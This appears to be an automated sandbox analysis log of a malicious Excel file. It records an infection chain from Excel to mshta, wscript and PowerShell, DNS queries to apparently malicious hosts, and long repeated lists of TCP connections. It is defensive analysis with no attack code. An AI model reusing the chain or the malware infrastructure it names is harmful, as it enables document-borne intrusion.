File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta, type: DROPPED

Source: unknown

HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdb source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdbhP source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: ljg.cl
Source: global traffic	DNS query: name: ljg.cl
Source: global traffic	DNS query: name: ljg.cl
Source: global traffic	DNS query: name: ljg.cl
Source: global traffic	DNS query: name: ljg.cl
Source: global traffic	DNS query: name: 3105.filemail.com
Source: global traffic	DNS query: name: 3105.filemail.com

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
